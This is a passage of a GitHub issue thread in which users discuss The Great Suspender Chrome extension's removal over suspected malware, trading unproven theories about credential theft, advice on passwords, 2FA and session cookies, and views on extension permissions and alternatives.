extension use are deprecated.</p> <p>I would highly encourage people to stop trying to come up with cleaver workarounds and forks, and change your workflow to a more permanent solution.</p> <p>I would also suggest that people not be so quick to recommend installing forks from github repos and other non-official sources that are truly intended for developers only. Keep in mind that the many of the target audience visiting this thread have little to no understanding of JS/extensions/security implications, and that doing so may be exposing these users to significant risk.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">9</span> 👎<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I just noticed something, which I am now 99% certain it has to do with the great suspender and the hacked version since last october or when it happened!</p> <p>I had the following issue on instagram over the past months, actually now when I think about it, it mostly started around in 2020 around october or november. So it would fit with the time window of this.</p> <p>I wasnt able to open any videos anymore on instagram, click on any vod clips, nor open my inbox. There would always come an "there was an error" message. It worked in Firefox but not in Chrome.</p> <p>I just noticed today, because I went on instagram again with Chrome, that it is all working now again, after the great suspender is gone!</p> <p>So this might be a hint, that the addon tried to steal instagram logins maybe or tried to hijack something on their page maybe with injections.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>I had the following issue on instagram over the past months, actually now when I think about it, it mostly started around in 2020 around october or november. So it would fit with the time window of this.</p> </blockquote> <p>Are you using any other extensions? <a rel="nofollow noopener" target="_blank" href="https://nfultz.github.io/notes/chrome-extension-forensics.html">Instagram has been specifically targeted</a>.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/418638?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="nfultz picture"> <strong>nfultz</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>I had the following issue on instagram over the past months, actually now when I think about it, it mostly started around in 2020 around october or november. So it would fit with the time window of this.</p> </blockquote> <p>Are you using any other extensions? <a rel="nofollow noopener" target="_blank" href="https://nfultz.github.io/notes/chrome-extension-forensics.html">Instagram has been specifically targeted</a>.</p> </blockquote> <p>Just... GREAT. I looked through my extensions:</p> <p><a rel="nofollow noopener" target="_blank" href="https://i.imgur.com/YF8O661.png">https://i.imgur.com/YF8O661.png</a></p> <p>I had used these before but had them on disabled, not sure since when.</p> <p>The issue with Instagram though is gone now since great suspender is removed. I just had the issue last week still when it was running.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>I would highly encourage people to stop trying to come up with cleaver workarounds and forks, and change your workflow to a more permanent solution.</p> <p>I would also suggest that people not be so quick to recommend installing forks from github repos and other non-official sources that are truly intended for developers only. Keep in mind that the many of the target audience visiting this thread have little to no understanding of JS/extensions/security implications, and that doing so may be exposing these users to significant risk.</p> </blockquote> <p><strong>@minig0d</strong> I am one of those target audience :) - and am advising a few friends etc in a similar boat on what the best replacement is. I was under the impression that The Marvellous Suspender was a great solution. It seems that's not the case? What do you recommend as a 'more permanent solution' for people wanting to achieve the original goal of the extension?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/77774546?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="jimmhay picture"> <strong>jimmhay</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Coincidentally, when the chrome plugin was removed from the chrome store, I received several 2FA notifications of attempted logins. Luckily, nearly all my accounts required at least a text message (yes I know it's not good practice, but it's easy and better than no 2FA at all). I was wondering what was happening, as I received these notifications before checking on why TheGreatSuspender has been removed (I noticed my tabs were gone).</p> <p>I don't think that's a coincidence, I rather think that the new maintainer, having been discovered and removed from the chrome store, is now consuming his database of stolen credentials. All users should change their login credentials ASAP, if possible using a <a rel="nofollow noopener" target="_blank" href="https://privacytools.io/software/passwords/">passwords manager</a>, and implement 2FA (<a rel="nofollow noopener" target="_blank" href="https://nakedsecurity.sophos.com/2016/08/18/nists-new-password-rules-what-you-need-to-know/">prefer using Google Authenticator or Authy rather than SMS text based 2FA as the latter is prone to SIM swapping attacks</a>). Luckily for me, nothing was stolen nor corrupted thanks to 2FA, but be careful. If you have institutional credentials, which are often not protectable by 2FA, change these too ASAP.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1118942?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lrq3000 picture"> <strong>lrq3000</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Coincidentally, when the chrome plugin was removed from the chrome store, I received several 2FA notifications of attempted logins. Luckily, nearly all my accounts required at least a text message (yes I know it's not good practice, but it's easy and better than no 2FA at all). I was wondering what was happening, as I received these notifications before checking on why TheGreatSuspender has been removed (I noticed my tabs were gone).</p> <p>I don't think that's a coincidence, I rather think that the new maintainer, having been discovered and removed from the chrome store, is now consuming his database of stolen credentials. All users should change their login credentials ASAP, if possible using a <a rel="nofollow noopener" target="_blank" href="https://privacytools.io/software/passwords/">passwords manager</a>, and implement 2FA (<a rel="nofollow noopener" target="_blank" href="https://nakedsecurity.sophos.com/2016/08/18/nists-new-password-rules-what-you-need-to-know/">prefer using Google Authenticator or Authy rather than SMS text based 2FA as the latter is prone to SIM swapping attacks</a>). Luckily for me, nothing was stolen nor corrupted thanks to 2FA, but be careful. If you have institutional credentials, which are often not protectable by 2FA, change these too ASAP.</p> </blockquote> <p>That's a pure conjecture. Unless you can link these 2 together by technical evidence don't claim it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/44023416?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="smith558 picture"> <strong>smith558</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">7</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>If you're going to claim for sure (or near certainty) a situation that happened to you is definitely related to the extension, please give it a second thought before posting if you have no evidence to back up your claim.</p> <p>Edit: remove fluff.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6139999?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="equinox picture"> <strong>equinox</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>This accident gives us a lesson that we should not relied too much on the built-in browser password manager such as Chrome password manager and sometimes external password manager such as bitwarden and keepass is important to protect our credentials. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/29157187?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dtantono picture"> <strong>dtantono</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">9</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>That's a pure conjecture. Unless you can link these 2 together by technical evidence don't claim it.</p> </blockquote> <p>Sure, that's a conjecture as I said. However, I received way more 2FA notifications <strong>this week-end</strong> than I ever received ever before since I activated 2FA years ago on my accounts.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1118942?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lrq3000 picture"> <strong>lrq3000</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Also no I'm an experienced computer scientist, there is no teamviewer or other kinds of holes (WTF, why do you want to assume that anyone who gets compromised is a noob?). I can bet my computer is much more secured than most. And also, <strong>nothing</strong> changed in my computing environment, no hardware, no software, and no special activity on the web (reading pubmed and scientific journals articles). The only thing that changed is TGS getting disabled, and I started receiving failed 2FA notifications before noticing that TGS was disabled, and the number increased tremendously this week-end. Temporally, it's highly suspiciously close.</p> <p>Now you do you.</p> <p><strong>@equinox</strong> : also I'm not distressed... please don't project on others your insecurities. I simply reported what I observed and what actions I took to secure my accounts. My accounts were not compromised and I already secured them all, that's just the thing you have to do when there is a risk. Don't start reassuring people for your own wellbeing, that's at best dishonest. We don't need reassurance here but information and practical steps, which is what I shared.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1118942?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lrq3000 picture"> <strong>lrq3000</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>One last thing: do you guys really think that if the maintainer was just acquiring some harmless analytics, they would have acted as shady as they did, hiding all infos about them and mounting a custom server? And on top of that, they would PAY the developer, just to get some analytics? Seriously how can you guys be so naive. If there is money, it means the new entity hoped to get MORE profit than what they paid. Analytics don't pay so much. But selling login credentials does.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1118942?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lrq3000 picture"> <strong>lrq3000</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>edit: Just to make it super clear in case you haven't already realised <strong>@lrq3000</strong>, my comment was never directed at you specifically (it was meant to be a general comment). Although I can understand why you thought it was.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6139999?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="equinox picture"> <strong>equinox</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">1</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>As a reminder, while there's no hard evidence of this occurring (and obtaining such evidence after-the-fact would be difficult or even impossible), it is <em>technically possible</em> for the extension to have collected login details at some point in time.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1663259?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="joepie91 picture"> <strong>joepie91</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>The issue with malware in Chrome addons is happening now since years but exploded over the last 2 years. Also that criminals are buying highly used "small" extensions and then include malware in them. Google is doing nothing about this.</p> <p>There are countless things Google devs could do, and they're doing NOTHING:</p> <ul> <li>safe mode, just allow extensions, which don't open up connections and dont use external code, and manual overwrite for specific ones</li> <li>warn about extensions, which want to open connections and run external code, also show and log the external includes</li> <li>limit more rights what addons can do, and implement some algorithms which indicate, the addon is doing something harmful like an antivirus for chrome addons</li> <li>make it very hard for a highly used extensions to change ownership, then have a hard check on new owner, just allow it with name address bank information and so on</li> <li>have a new or larger team to check addons, especially if ownership changes</li> <li>Google needs to fill in lawsuits against criminals using this scheme with all their power </li> </ul> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">15</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@makedir</strong>, in that case, I think someone should give some advice and relay your suggestions to Google team and perhaps Microsoft as well. So, they can take an action and prevent this incident in the future. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/29157187?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dtantono picture"> <strong>dtantono</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@DestroyerXyz</strong> thank you! That's reassuring, I don't understand the extent of what Javascript could do. May I also ask: I didn't know the risks of session hijacking/spoofing so I didn't log out everywhere before deleting cookies nor do I have a recent backup of appdata (a learning experience unfortunately). Is there a way to negate a potentially logged cookie? For some sites it seems changing the password is enough to log out other sessions and some have the option to 'sign out of everywhere', do either of these work?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70635542?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="pituchi picture"> <strong>pituchi</strong> <span class="text-muted ml-1">on 8 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <p>I would highly encourage people to stop trying to come up with cleaver workarounds and forks, and change your workflow to a more permanent solution.<br /> I would also suggest that people not be so quick to recommend installing forks from github repos and other non-official sources that are truly intended for developers only. Keep in mind that the many of the target audience visiting this thread have little to no understanding of JS/extensions/security implications, and that doing so may be exposing these users to significant risk.</p> </blockquote> <p><strong>@minig0d</strong> I am one of those target audience :) - and am advising a few friends etc in a similar boat on what the best replacement is. I was under the impression that The Marvellous Suspender was a great solution. It seems that's not the case? What do you recommend as a 'more permanent solution' for people wanting to achieve the original goal of the extension?</p> </blockquote> <p>Best suggestions<br /> 1) Change your workflow so you don't keep so many tabs open at one time. Yes I know people will balk at this, but it's really not a great habit for productivity reasons anyway...<br /> 2) Try NOT using an extension... Chrome has significantly improved memory handling since this extension was developed, and this alone may be enough.<br /> 3) Consider trying the new Edge... it's also Chromium based and seems to perform a decent amount better. It includes some additional memory tweaks that are not in Google Chrome...<br /> 4) If those aren't enough, I would enable the chrome experiments: chrome://flags/#tab-groups-collapse and chrome://flags/#tab-groups-collapse-freezing . As you'll see on the warning, these are experimental and may not be completely stable. However, I think they are significantly more secure than using an extension like TGS as you're not opening up vulnerabilities to a fourth-party<br /> 5) If you HAVE to use an extension because you really feel the need to open yourself up to the risk, find one that uses minimal permissions... I am not familiar with it, so I will not specifically cite the name of it, but I just looked at the permissions of another "highly rated" tab manager extension, and it doesn't request the vast majority of the dangerous permissions that TGS uses... </p> <pre><code class="prettyprint">"permissions": [ "tabs", "contextMenus", "activeTab", "chrome://favicon/" ] </code></pre> <ul> <li>tabs permission allows the extension to manipulate tabs that are not the active one (the most dangerous one)</li> <li>activeTab allows the ext to manipulate the active tab</li> <li>contextMenus allows the ext to add to the context menu (right click menu)</li> <li>favicon allows the extension to use chrome's favicon retrieval mechanism for favicons (I assume the extension shows you the icon with the name of the site for decoration).</li> </ul> <p>In other words, those permissions are fairly reasonable and fairly tame... You can read more on permissions here if you'd like:<br /> <a rel="nofollow noopener" target="_blank" href="https://developer.chrome.com/docs/extensions/mv2/declare_permissions/">Chrome Developer - Extension Permissions Page</a></p> <p>Conversely, you can see all the permissions that are opened up in TGS in the<a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/blob/master/src/manifest.json"> manifest file</a>. I'll let you look all of them up if you're interested, but you can see how you're opening up pandora's box. (And as mentioned before, all the forks will use the same permissions unless there is a significant rewrite of the code.) (Also as mentioned before, all the forks will cease to stop working as soon as Manifest V3 is made mandatory in Chrome unless the code is rewritten.)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/54046315?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="minig0d picture"> <strong>minig0d</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">6</span> ❤<span class="ml-2 mr-3">3</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Change your workflow so you don't keep so many tabs open at one time.</p> </blockquote> <p>Most full-stack developers would balk at this. Lets face it, we don't live<br /> in a paper world anymore, where it's easy to flip between pages of multiple<br /> reference books; everything is online and keeping tabs open is far superior<br /> now to multiple bookmarks for references. At work, I have at least 6 main<br /> windows open, usually up to 10+ tabs each on MDN, python.org, github, AWS,<br /> stackoverflow, reddit, etc.</p> <p>There's a couple of deeper inspection permissions required to implement the<br /> "don't suspend when a form input has data in it". Mostly used for things<br /> like Reddit or user story grooming in Jira/Zenhub.</p> <p>On Mon, Feb 8, 2021 at 6:37 PM minig0d <a rel="nofollow noopener" target="_blank" href="mailto:notifications@github.com">notifications@github.com</a> wrote:</p> <blockquote> <p>I would highly encourage people to stop trying to come up with cleaver<br /> workarounds and forks, and change your workflow to a more permanent<br /> solution.<br /> I would also suggest that people not be so quick to recommend installing<br /> forks from github repos and other non-official sources that are truly<br /> intended for developers only. Keep in mind that the many of the target<br /> audience visiting this thread have little to no understanding of<br /> JS/extensions/security implications, and that doing so may be exposing<br /> these users to significant risk.</p> <p><strong>@minig0d</strong> <a rel="nofollow noopener" target="_blank" href="https://github.com/minig0d">https://github.com/minig0d</a> I am one of those target audience<br /> :) - and am advising a few friends etc in a similar boat on what the best<br /> replacement is. I was under the impression that The Marvellous Suspender<br /> was a great solution. It seems that's not the case? What do you recommend<br /> as a 'more permanent solution' for people wanting to achieve the original<br /> goal of the extension?</p> <p>Best suggestions</p> <ol> <li>Change your workflow so you don't keep so many tabs open at one<br /> time. Yes I know people will balk at this, but it's really not a great<br /> habit for productivity reasons anyway...</li> <li>Try NOT using an extension... Chrome has significantly improved<br /> memory handling since this extension was developed, and this alone may be<br /> enough.</li> <li>Consider trying the new Edge... it's also Chromium based and seems<br /> to perform a decent amount better. It includes some additional memory<br /> tweaks that are not in Google Chrome...</li> <li>If those aren't enough, I would enable the chrome experiments:<br /> <a rel="nofollow noopener" target="_blank" href="chrome://flags/#tab">chrome://flags/#tab</a>-groups-collapse and<br /> <a rel="nofollow noopener" target="_blank" href="chrome://flags/#tab">chrome://flags/#tab</a>-groups-collapse-freezing . As you'll see on the<br /> warning, these are experimental and may not be completely stable. However,<br /> I think they are significantly more secure than using an extension like TGS<br /> as you're not opening up vulnerabilities to a fourth-party</li> <li>If you HAVE to use an extension because you really feel the need to<br /> open yourself up to the risk, find one that uses minimal permissions... I<br /> am not familiar with it, so I will not specifically cite the name of it,<br /> but I just looked at the permissions of another "highly rated" tab manager<br /> extension, and it doesn't request the vast majority of the dangerous<br /> permissions that TGS uses...</li> </ol> <p>"permissions": [<br /> "tabs",<br /> "contextMenus",<br /> "activeTab",<br /> "<a rel="nofollow noopener" target="_blank" href="chrome://favicon/">chrome://favicon/</a>"<br /> ]</p> <ul> <li>tabs permission allows the extension to manipulate tabs that are not<br /> the active one (the most dangerous one)</li> <li>activeTab allows the ext to manipulate the active tab</li> <li>contextMenus allows the ext to add to the context menu (right click<br /> menu)</li> <li>favicon allows the extension to use chrome's favicon retrieval<br /> mechanism for favicons (I assume the extension shows you the icon with the<br /> name of the site for decoration).</li> </ul> <p>In other words, those permissions are fairly reasonable and fairly tame...<br /> You can read more on permissions here if you'd like:<br /> Chrome Developer - Extension Permissions Page<br /> <a rel="nofollow noopener" target="_blank" href="https://developer.chrome.com/docs/extensions/mv2/declare_permissions/">https://developer.chrome.com/docs/extensions/mv2/declare_permissions/</a></p> <p>Conversely, you can see all the permissions that are opened up in TGS in<br /> the manifest file<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/blob/master/src/manifest.json">https://github.com/greatsuspender/thegreatsuspender/blob/master/src/manifest.json</a>.<br /> I'll let you look all of them up if you're interested, but you can see how<br /> you're opening up pandora's box. (And as mentioned before, all the forks<br /> will use the same permissions unless there is a significant rewrite of the<br /> code.) (Also as mentioned before, all the forks will cease to stop working<br /> as soon as Manifest V3 is made mandatory in Chrome unless the code is<br /> rewritten.)</p> <p>—<br /> You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-775536558">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-775536558</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/ABJAKBJJ2ER7IMJI2REKFELS6BYR5ANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/ABJAKBJJ2ER7IMJI2REKFELS6BYR5ANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5375237?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="cowbert picture"> <strong>cowbert</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">13</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@DestroyerXyz</strong> thank you! That's reassuring, I don't understand the extent of what Javascript could do. May I also ask: I didn't know the risks of session hijacking/spoofing so I didn't log out everywhere before deleting cookies nor do I have a recent backup of appdata (a learning experience unfortunately). Is there a way to negate a potentially logged cookie? For some sites it seems changing the password is enough to log out other sessions and some have the option to 'sign out of everywhere', do either of these work?</p> </blockquote> <p>I didn't completely understand your question?<br /> Deleting cookies automatically logs you out of all websites<br /> And if TGS did get your password then you would need to change them, logging out would do nothing<br /> I actually installed TGS a few hours before it was removed from the Chrome Web Store so I was probably safe from it as it had no way to extract my passwords from already logged in websites and I also use a password manager and don't save passwords in Chrome and even if I did it probably can't get them from their either </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70191184?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="DestroyerXyz picture"> <strong>DestroyerXyz</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">4</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@makedir</strong> Great points! I would add one: the possibility to avoid auto-updating of extensions. Although auto-updating can be a nice feature, as show here this forced users to install a malware-ridden version of a relatively safe extension with past releases (although I know v1.7.6 already had shady analytics - but I installed TGS much earlier, years ago and I had no need to update functionally wise). Because there is no choice to opt-out of auto-updating, all the users got the updated TGS whether they wanted it or not.</p> <p>PS: <strong>@equinox</strong>: thank you for clarifying, my apologies for my tone!</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1118942?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="lrq3000 picture"> <strong>lrq3000</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">4</span> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@DestroyerXyz</strong> Deleting your cookies won't log you out, it will just make you unable to access that session. If the attacker has a copy of the cookies, he will still be able to use them. Changing passwords <em>might</em> terminate all other sessions, but that isn't guaranteed.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I did not consider the hacker obtaining the cookies but some websites have protection so that only that system can use those cookies and will invalidate those cookies if they are used in a different system. And most if not all websites terminate all sessions after password change because that is literally one of the reasons to change a password. Also as <strong>@pituchi</strong> said some websites have the option to straight up invalidate all sessions.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70191184?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="DestroyerXyz picture"> <strong>DestroyerXyz</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@minig0d</strong> </p> <blockquote> <p>Change your workflow so you don't keep so many tabs open at one time. Yes I know people will balk at this, but it's really not a great habit for productivity reasons anyway...</p> </blockquote> <p>Please don't make assumptions about what works for other people to maximize their productivity. There are good reasons some of us have many tabs open, productivity being one of them.</p> <p>More generally, you should think twice before basically telling people that their workflow is wrong, and work to understand why it is how it is, first.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1663259?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="joepie91 picture"> <strong>joepie91</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> ❤<span class="ml-2 mr-3">15</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@luke-jr do the 'sign out of everywhere' and 'sign out of all devices' options invalidate potentially logged cookies?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70635542?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="pituchi picture"> <strong>pituchi</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>@luke-jr do the 'sign out of everywhere' and 'sign out of all devices' options invalidate potentially logged cookies?</p> </blockquote> <p>of course it does</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@minig0d</strong> There are many different tab-suspending alternatives. Auto Tab Discard is an example, though it lacks the gleaming polish of TGS. However, relying on Chrome's built-in memory saving is not an effective solution. Chrome will not discard tabs unless memory is running very low: that means a higher memory pressure, which leads to more swapping. Others have shown why simply changing workflow isn't a great idea.</p> <p>Manifest V3 changes many things, but the core functionality of TGS will remain possible (adblockers will be crippled, but that's not the point). A rewrite may be required, but the Marvelous Suspender fork has already made some pretty significant changes, and I don't see the service worker requirement as crippling.</p> <p>At the end of the day, the current state of computer security is abysmal. It doesn't really matter what extensions you use if an attacker abuses a 0day in Chrome to get sandbox escape from a seemingly innocent site. Any and every piece of software on your computer can become malicious at any time, and a large portion of them auto-update, or update without notice. The only way to be truly secure is to leave your computer off: as extensions are a usually a relatively safe way of adding functionality, it is totally fair to expect people to install them. Every single person who installed TGS got a big notice about how broad it's security permissions were, and went ahead with it anyways.</p> <p>I hope that, in the future, Chrome can consider making more fine-grained security permissions: reducing the number of situations where content scripts are necessary, such as by creating a separate API to examine DOM state from within a background script/service worker, which blocks access to sensitive elements. But extending functionality will always be a risk, and you must be willing to accept that if you don't want to stick to a text-mode browsing experience.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/13556193?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="TheMageKing picture"> <strong>TheMageKing</strong> <span class="text-muted ml-1">on 9 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">6</span> 